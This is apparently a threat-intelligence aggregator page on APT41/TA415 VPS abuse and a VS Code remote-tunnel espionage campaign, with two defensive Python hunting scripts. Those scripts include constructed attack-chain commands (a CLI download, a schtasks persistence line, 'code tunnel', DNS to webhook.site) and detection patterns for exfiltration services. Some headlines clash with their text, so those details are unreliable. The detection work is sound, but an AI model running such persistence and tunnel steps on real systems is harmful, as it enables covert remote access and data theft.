CyberHappenings

Threat Actors Exploit VPS Infrastructure for SaaS Account Compromises

📰 3 unique sources, 5 articles

Summary


Threat actors, including the China-linked APT41 group and the TA415 activity cluster that overlaps with it, are abusing commercial virtual private server (VPS) infrastructure to stand up attack infrastructure quickly and quietly. The tactic has been observed in coordinated SaaS account compromises across multiple customer environments and in a targeted cyber espionage campaign against U.S. trade officials. Because VPS address space is cheap, plentiful and located wherever the attacker chooses, it lets attackers sidestep geolocation-based defenses, avoid IP reputation checks, and blend into legitimate traffic; it also means a burned server is replaced in minutes, which makes the activity hard for defenders to track and respond to.

In the SaaS account compromises, the activity included brute-force sign-in attempts, anomalous logins, inbox rule creation tied to phishing campaigns, and impersonation. Accounts were compromised from VPS infrastructure at providers including Hyonix, Host Universal, Mevspace, and Hivelocity. Once inside a mailbox, the attackers deleted phishing emails and created obfuscated inbox rules to hide their activity from the mailbox owner.

The espionage campaign targeted U.S. trade officials with spear-phishing that impersonated a U.S. Congressman, Rep. John Moolenaar, Chair of the Select Committee on Strategic Competition between the US and the Chinese Communist Party. Earlier messages spoofed the US-China Business Council, inviting recipients to a closed-door briefing on the United States' affairs with China and Taiwan; later messages impersonating Moolenaar requested feedback on draft legislation on sanctions against China. In July and August 2025 the intrusions relied on a Visual Studio Code (VS Code) remote tunnel for persistent remote access instead of conventional malware, using a legitimate developer tool to create a hidden path into the environment and siphon data to attacker-controlled servers.

The phishing links led to password-protected archives hosted on well-known cloud services, each containing a shortcut (LNK) file and a hidden subfolder. Launching the LNK file runs a batch script stored in the hidden folder and opens a decoy PDF hosted on OneDrive. The script starts a multi-stage infection: it downloads the VS Code command line interface (CLI) from Microsoft's own servers, creates a scheduled task for persistence, and establishes a VS Code remote tunnel authenticated through GitHub. It also collects system information and the contents of various user directories and sends them to the attackers. In recent attacks the script additionally sends the tunnel's GitHub verification code; the threat actor uses that code to authorize the tunnel, connect to the victim's computer remotely, and execute arbitrary commands through VS Code's integrated terminal.
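The identity-side signals described above (successful sign-ins from VPS providers, brute force followed by a success, and obfuscated inbox rules that delete or hide phishing mail) can be hunted in sign-in and mailbox audit exports. The Python below is an added example, not code from any of the reports this page summarizes. The events are constructed, the field names are assumptions (Entra ID and Microsoft 365 audit exports differ by tool), and the hosting-provider list is simply the four providers named above; in production it would be an ASN or hosting-range feed.

```python
"""Hunt for VPS-sourced SaaS account compromise in sign-in and mailbox audit exports.

All events are constructed; field names are assumptions (Entra ID and
Microsoft 365 audit exports differ by tool)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Providers named in the reporting above. In production, replace with an
# ASN/hosting-range feed: the signal is "hosting provider", not these four names.
HOSTING_ORGS = {"hyonix", "host universal", "mevspace", "hivelocity"}

SIGNINS = [  # constructed sign-in events: three failures then a success from a VPS
    {"ts": "2025-05-12T09:01:00Z", "user": "a.lee@example.com", "ip": "198.51.100.7", "org": "Hyonix LLC", "ok": False},
    {"ts": "2025-05-12T09:01:10Z", "user": "a.lee@example.com", "ip": "198.51.100.7", "org": "Hyonix LLC", "ok": False},
    {"ts": "2025-05-12T09:01:20Z", "user": "a.lee@example.com", "ip": "198.51.100.7", "org": "Hyonix LLC", "ok": False},
    {"ts": "2025-05-12T09:01:40Z", "user": "a.lee@example.com", "ip": "198.51.100.7", "org": "Hyonix LLC", "ok": True},
    {"ts": "2025-05-12T09:30:00Z", "user": "b.ng@example.com", "ip": "203.0.113.9", "org": "Example Broadband", "ok": True},
]
AUDIT = [  # constructed mailbox audit events (New-InboxRule parameters as a dict)
    {"ts": "2025-05-12T09:05:00Z", "user": "a.lee@example.com", "ip": "198.51.100.7", "op": "New-InboxRule",
     "params": {"Name": ".", "SubjectContainsWords": ["password", "invoice"], "DeleteMessage": True, "MarkAsRead": True}},
    {"ts": "2025-05-12T10:00:00Z", "user": "b.ng@example.com", "ip": "203.0.113.9", "op": "New-InboxRule",
     "params": {"Name": "Newsletters", "MoveToFolder": "Archive", "FromAddressContainsWords": ["news@vendor.example"]}},
]

def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")

def is_hosting(org):
    return any(h in org.lower() for h in HOSTING_ORGS)

def brute_force_then_success(signins, min_failures=3, window=timedelta(minutes=10)):
    """(user, ip) pairs where >= min_failures failures precede a success within window."""
    by_key = defaultdict(list)
    for e in sorted(signins, key=lambda e: e["ts"]):
        by_key[(e["user"], e["ip"])].append(e)
    hits = set()
    for key, events in by_key.items():
        recent_failures = []
        for e in events:
            t = parse_ts(e["ts"])
            recent_failures = [f for f in recent_failures if t - f <= window]
            if e["ok"]:
                if len(recent_failures) >= min_failures:
                    hits.add(key)
            else:
                recent_failures.append(t)
    return hits

# Rule names like ".", "..", " " or "" that the mailbox owner will not notice.
OBFUSCATED_NAME = re.compile(r"^[\s.,_\-]{0,3}$")
# Folders attackers move mail into because nobody looks there.
HIDING_FOLDERS = {"RSS Feeds", "RSS Subscriptions", "Conversation History", "Junk Email"}
# Subject/body keywords that phishing clean-up rules typically filter on.
PHISH_WORDS = {"password", "invoice", "payment", "phish", "hacked", "suspicious", "security"}

def suspicious_rule(params):
    """Reasons a New-InboxRule looks like post-compromise concealment; empty if benign."""
    reasons = []
    if OBFUSCATED_NAME.match(params.get("Name", "")):
        reasons.append("obfuscated rule name")
    if params.get("DeleteMessage") or params.get("MoveToFolder") in HIDING_FOLDERS:
        reasons.append("hides mail (delete or move to unused folder)")
    words = {w.lower() for w in params.get("SubjectContainsWords", []) + params.get("BodyContainsWords", [])}
    if words & PHISH_WORDS:
        reasons.append("keyword filter on " + ", ".join(sorted(words & PHISH_WORDS)))
    return reasons

def hunt(signins, audit):
    """Correlate hosting-provider sign-ins, brute force and inbox rules into findings."""
    findings = []
    bf = brute_force_then_success(signins)
    hosting = {(e["user"], e["ip"]) for e in signins if e["ok"] and is_hosting(e["org"])}
    for user, ip in hosting:
        findings.append({"user": user, "ip": ip, "why": "successful sign-in from hosting/VPS provider"})
    for user, ip in bf:
        findings.append({"user": user, "ip": ip, "why": "brute force followed by success"})
    for a in audit:
        if a["op"] != "New-InboxRule":
            continue
        reasons = suspicious_rule(a["params"])
        if (a["user"], a["ip"]) in hosting | bf:
            reasons.append("created from a flagged sign-in session")
        if reasons:
            findings.append({"user": a["user"], "ip": a["ip"],
                             "why": "inbox rule %r: %s" % (a["params"].get("Name"), "; ".join(reasons))})
    return findings

if __name__ == "__main__":
    for f in hunt(SIGNINS, AUDIT):
        print(f"{f['user']} from {f['ip']}: {f['why']}")
```

The correlation step is what makes this usable: a developer's jump host or a legitimate mail-hygiene rule will each trip one check, but an inbox rule named "." that deletes anything mentioning "password", created minutes after a success that followed three failures from a hosting provider, is the pattern described above, and any rule created from a flagged session is worth reviewing even when its parameters look benign.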

Timeline

  1. 17.09.2025 15:59 📰 1 article · ⏱ 5h ago

    APT41 Operates from Chengdu, China, with Contractor Ties

    TA415 operates out of Chengdu, China, as a private contractor to the Chinese government under the company name Chengdu 404 Network Technology, and has ties to other private contractors, including i-Soon.

  2. 17.09.2025 15:56 📰 1 article · ⏱ 5h ago

    TA415 Conducts Spear-Phishing Campaigns Using U.S.-China Economic Lures

    The TA415 threat actor, associated with APT41 and Brass Typhoon, has been targeting U.S. government entities, think tanks, and academic organizations with U.S.-China economic-themed spear-phishing lures. The group impersonated the Chair of the Select Committee on Strategic Competition between the US and the Chinese Communist Party, as well as the U.S.-China Business Council, to target individuals and organizations focused predominantly on U.S.-China relations, trade, and economic policy. It relied on the Cloudflare WARP VPN service to obscure the origin of its activity. The phishing emails linked to password-protected archives hosted on public cloud sharing services such as Zoho WorkDrive, Dropbox, and OpenDrive; each archive contained an LNK file that executed a batch script and displayed a decoy PDF document. The batch script ran an obfuscated Python loader named WhirlCoil and created a scheduled task to run the loader every two hours for persistence. The loader established a Visual Studio Code remote tunnel for persistent backdoor access and harvested system information and the contents of various user directories. The harvested data and the tunnel's verification code were sent to a free request logging service.

  3. 10.09.2025 19:44 📰 2 articles · ⏱ 7d ago

    APT41 Exploits Developer Tools in Cyber Espionage Campaign

    APT41 conducts cyber espionage across diverse sectors and geographies, including logistics, utilities, healthcare, high-tech, and telecommunications. Active since at least 2012, the group has carried out both espionage and financially motivated operations, and has used software supply chain compromises, bootkits, and compromised digital certificates. Its financially motivated targeting of the video game industry contributed to the tradecraft later used in its espionage operations. The TA415 cluster, associated with APT41 and Brass Typhoon, has been targeting U.S. government entities, think tanks, and academic organizations with U.S.-China economic-themed spear-phishing lures, impersonating key figures and organizations to gain unauthorized access to sensitive information. The attacks used Visual Studio Code remote tunnels for persistent access and data exfiltration, and relied on public cloud services and obfuscation to evade detection.

  4. 10.09.2025 12:53 📰 3 articles · ⏱ 7d ago

    APT41 Targets U.S. Trade Officials in Ongoing Cyber Espionage Campaigns

    The FBI is investigating an ongoing cyber espionage campaign targeting U.S. trade officials. The campaign used spear-phishing that impersonated a U.S. Congressman to gain unauthorized access to systems and sensitive information, and abused developer tooling (Visual Studio Code remote tunnels) to create hidden access paths and siphon data to attacker-controlled servers. The activity is attributed to TA415, the cluster associated with APT41 and Brass Typhoon, whose U.S.-China economic-themed lures, impersonation of key figures and organizations, and use of public cloud services and obfuscation to evade detection are described in the other entries of this timeline.

  5. 21.08.2025 20:42 📰 5 articles · ⏱ 27d ago

    VPS Infrastructure Abuse Detected in May 2025 SaaS Account Compromises

    The May 2025 SaaS account compromises in which VPS abuse was detected are believed to be part of a broader campaign involving impersonation and the targeting of U.S. trade officials, with the involvement of the China-linked APT41 group. That campaign, attributed to TA415, impersonated U.S. Rep. John Moolenaar, Chair of the Select Committee on Strategic Competition between the US and the Chinese Communist Party, and spoofed the US-China Business Council with invitations to a closed-door briefing on the United States' affairs with China and Taiwan; later messages impersonating Moolenaar requested feedback on draft legislation on sanctions against China. The group used the Cloudflare WARP VPN service to obscure its origin. In July and August 2025 the intrusions relied on a Visual Studio Code (VS Code) remote tunnel for persistent remote access rather than conventional malware: phishing links led to password-protected archives on Zoho WorkDrive, Dropbox or OpenDrive containing an LNK file and a hidden subfolder; the LNK file ran a batch script from the hidden folder and opened a decoy PDF hosted on OneDrive; the script launched an obfuscated Python loader named WhirlCoil, scheduled it to run every two hours, downloaded the VS Code command line interface (CLI) from Microsoft's servers, and established a GitHub-authenticated VS Code remote tunnel. The loader also harvested system information and the contents of various user directories and sent them, together with the tunnel's GitHub verification code, to a free request logging service; the threat actor then used that code to access the victim's computer and execute arbitrary commands through VS Code's integrated terminal.

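Timeline entries 2 and 5 describe the same endpoint chain: an LNK file launches a batch script from a hidden folder, the VS Code CLI is fetched from Microsoft, a scheduled task provides persistence, `code tunnel` opens a GitHub-authenticated remote tunnel, and the device-verification code plus harvested data go to a free request-logging service. The Python below is an added example of hunting that chain in Sysmon-style process-creation and DNS events; it is not code from any of the reports this page summarizes. The sample events are constructed. The CLI download URL pattern, the tunnel relay domains (tunnels.api.visualstudio.com, devtunnels.ms), the request-logging domains, and the wording of the GitHub device-code prompt are assumptions drawn from public VS Code and GitHub behaviour, not indicators published for this campaign.

```python
"""Hunt for the VS Code remote-tunnel backdoor chain in endpoint telemetry.

Events are constructed, Sysmon-style records (id 1 = process create,
id 22 = DNS query). Domain and URL patterns are assumptions based on
public VS Code / GitHub behaviour, not published indicators."""
import re
from collections import defaultdict

# Stage 2: VS Code CLI fetched straight from Microsoft (assumed download host).
CLI_DOWNLOAD = re.compile(r"update\.code\.visualstudio\.com/.*?/cli-", re.I)
# Stage 3: scheduled task whose action launches a Python loader, the CLI or a batch file.
SCHTASKS = re.compile(r"schtasks(\.exe)?\s+/create\b.*?/tr\s+.*?(python|code|\.bat)", re.I)
# Stage 4: the tunnel itself; `code tunnel` is the official CLI syntax.
TUNNEL = re.compile(r"\bcode(\.exe)?\b.*?\btunnel\b", re.I)
# Stage 5: DNS for the tunnel relay (assumed domains) or a free request-logging
# service (assumed examples; the reporting names no specific service).
TUNNEL_DNS = re.compile(r"(tunnels\.api\.visualstudio\.com|devtunnels\.ms)$", re.I)
EXFIL_DNS = re.compile(r"(webhook\.site|requestbin\.|pipedream\.net)$", re.I)
# The GitHub device-code prompt the CLI prints; the loader relays this code to the attacker.
DEVICE_CODE = re.compile(r"github\.com/login/device.*?\bcode\s+([A-Z0-9]{4}-[A-Z0-9]{4})", re.I)

EVENTS = [  # constructed sample telemetry from two hosts
    {"host": "WS-17", "id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "C:\Users\u\Downloads\Briefing\_hidden\run.bat"'},
    {"host": "WS-17", "id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl.exe -L https://update.code.visualstudio.com/latest/cli-win32-x64/stable -o cli.zip"},
    {"host": "WS-17", "id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks /create /sc hourly /mo 2 /tn "Updater" /tr "C:\Users\u\AppData\Local\py\python.exe C:\Users\u\AppData\Local\py\loader.py" /f'},
    {"host": "WS-17", "id": 1, "parent": r"C:\Users\u\AppData\Local\py\python.exe",
     "image": r"C:\Users\u\AppData\Local\code.exe",
     "cmd": "code.exe tunnel --accept-server-license-terms --name WS-17"},
    {"host": "WS-17", "id": 22, "query": "global.rel.tunnels.api.visualstudio.com"},
    {"host": "WS-17", "id": 22, "query": "webhook.site"},
    # A developer opening a project in VS Code: must not alert on its own.
    {"host": "WS-03", "id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "cmd": r"Code.exe --new-window C:\src\app"},
]

def classify(ev):
    """Map one event to a chain stage name, or None if it matches no stage."""
    if ev["id"] == 1:
        cmd = ev["cmd"]
        if CLI_DOWNLOAD.search(cmd):
            return "cli-download"
        if SCHTASKS.search(cmd):
            return "schtasks-persistence"
        if TUNNEL.search(cmd):
            return "tunnel-start"
        # Stage 1: Explorer (i.e. a double-clicked LNK) spawning cmd.exe on a batch file.
        if ev["parent"].lower().endswith("explorer.exe") and ".bat" in cmd.lower():
            return "lnk-batch"
    elif ev["id"] == 22:
        if TUNNEL_DNS.search(ev["query"]):
            return "tunnel-dns"
        if EXFIL_DNS.search(ev["query"]):
            return "exfil-dns"
    return None

def hunt(events, min_stages=2):
    """Hosts showing at least min_stages distinct stages of the chain, with the stages seen."""
    stages = defaultdict(set)
    for ev in events:
        stage = classify(ev)
        if stage:
            stages[ev["host"]].add(stage)
    return {h: sorted(s) for h, s in stages.items() if len(s) >= min_stages}

def extract_device_code(cli_output):
    """The GitHub device code the loader scrapes from `code tunnel` output, or None."""
    m = DEVICE_CODE.search(cli_output)
    return m.group(1).upper() if m else None

if __name__ == "__main__":
    for host, seen in hunt(EVENTS).items():
        print(f"ALERT {host}: {', '.join(seen)}")
    print(extract_device_code("To grant access to the server, please log into "
                              "https://github.com/login/device and use code 1A2B-3C4D"))
```

Single-stage matches are noisy on developer workstations (an engineer legitimately running `code tunnel` hits stage 4 alone), so the alert requires two or more distinct stages on one host. `extract_device_code` shows what the loader harvests: the tunnel is useless to the attacker until someone enters that code at GitHub, so a device-code prompt appearing in the output of a process nobody launched interactively, or outbound traffic to a request-logging service right after a `code tunnel` start, is the point in the chain where the tunnel is being handed over.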


Similar Happenings

RaccoonO365 Phishing-as-a-Service Infrastructure Disrupted

Microsoft and Cloudflare disrupted the RaccoonO365 phishing-as-a-service (PhaaS) network, seizing 338 domains used by the threat group Storm-2246. The operation targeted over 5,000 Microsoft 365 credentials from 94 countries since July 2024. The group, led by Joshua Ogundipe, used Cloudflare services to protect phishing pages, making detection more challenging. The disruption began on September 2, 2025, and involved banning domains, placing warning pages, and terminating associated scripts. The group targeted over 2,300 organizations in the U.S., including healthcare entities, and offered AI-powered services to enhance phishing attacks. The stolen credentials, cookies, and other data were used in financial fraud attempts, extortion attacks, or as initial access to other victims' systems. RaccoonO365 phishing emails are often a precursor to malware and ransomware, which have severe consequences for hospitals.

SlopAds Fraud Ring Exploits 224 Android Apps to Drive 2.3 Billion Daily Ad Bids

A fraudulent ad operation, SlopAds, has been identified, exploiting 224 Android apps to generate 2.3 billion ad bids daily. The apps, collectively downloaded 38 million times across 228 countries, use steganography and hidden WebViews to create fraudulent ad impressions and clicks. The operation was disrupted after Google removed the offending apps from the Play Store. The SlopAds campaign is notable for its sophisticated tactics, including conditional fraud execution and the use of AI-themed services for command and control. The fraudulent behavior is triggered only when apps are downloaded via ad clicks, making detection more challenging. The campaign's infrastructure includes multiple domains and a complex feedback loop designed to evade security researchers. The campaign's highest concentration of ad impressions originated from the United States (30%), followed by India (10%) and Brazil (7%).

FileFix Attack Using Steganography to Deploy StealC Infostealer

A new FileFix social engineering campaign impersonates Meta account-suspension warnings to trick users into installing the StealC infostealer. The attack hides its malicious scripts and executables inside a JPG image using steganography (the carrier images are AI-generated) and targets browser credentials, messaging app data, cryptocurrency wallets and cloud service accounts. The FileFix technique, created by red team researcher mr.d0x and previously used by the Interlock ransomware gang, abuses the File Explorer address bar to execute PowerShell commands; it is less suspicious than ClickFix because it uses File Explorer rather than the Run dialog, which also gives it a broader range of high-value targets and lets it bypass detections built for the older technique. Acronis discovered the campaign and observed it over a two-week period, with multiple variants using different payloads and domains. The chain starts with a phishing email impersonating Facebook security; a phishing site translated into at least 16 languages presents a fake Cloudflare Turnstile verification page and instructs the user to copy and paste a command into the File Explorer address bar, which can also be redirected to a Windows File Explorer search query. Malicious components are hosted in Bitbucket repositories to borrow the platform's reputation. Acronis calls it the most widespread, customized and sophisticated FileFix campaign to date, affecting users in over 16 countries, and security researcher Eliad Kimhy expects FileFix attacks to increase.
An evolved FileFix chain, designed to bypass traditional detection, instead delivers MetaStealer. It uses a Windows shortcut (LNK) file disguised as a PDF and abuses the Windows search protocol to redirect users to an attacker-controlled SMB share. The LNK file downloads a legitimate AnyDesk installer alongside a malicious MSI package; the MSI contains a DLL and a CAB archive holding the malicious files, including a MetaStealer dropper protected with Private EXE Protector and designed to steal cryptocurrency wallets.

Supply Chain Attack Targeting npm Registry Compromises 40 Packages

A supply chain attack targeting the npm registry has compromised over 700 packages maintained by multiple developers. The attack uses a malicious script (bundle.js) to steal credentials from developer machines. The compromised packages include various npm modules used in different projects. The attack is capable of targeting both Windows and Linux systems. The malicious script scans for secrets using TruffleHog's credential scanner and transmits them to an external server controlled by the attackers. Developers are advised to audit their environments and rotate credentials if the affected packages are present.

VoidProxy phishing service targets Microsoft 365 and Google accounts

A new phishing-as-a-service (PhaaS) platform, VoidProxy, targets Microsoft 365 and Google accounts, including those protected by third-party SSO providers like Okta. The platform uses adversary-in-the-middle (AitM) tactics to steal credentials, multi-factor authentication (MFA) codes, and session cookies in real-time. The attack begins with emails from compromised accounts at email service providers, directing recipients to phishing sites through multiple redirections. The malicious sites are hosted on disposable domains protected by Cloudflare. VoidProxy's AitM tactics allow it to intercept and relay traffic between the victim and legitimate services, capturing sensitive information. Users with phishing-resistant authentications like Okta FastPass are protected from these attacks. The platform was discovered by Okta Threat Intelligence researchers, who describe it as scalable, evasive, and sophisticated.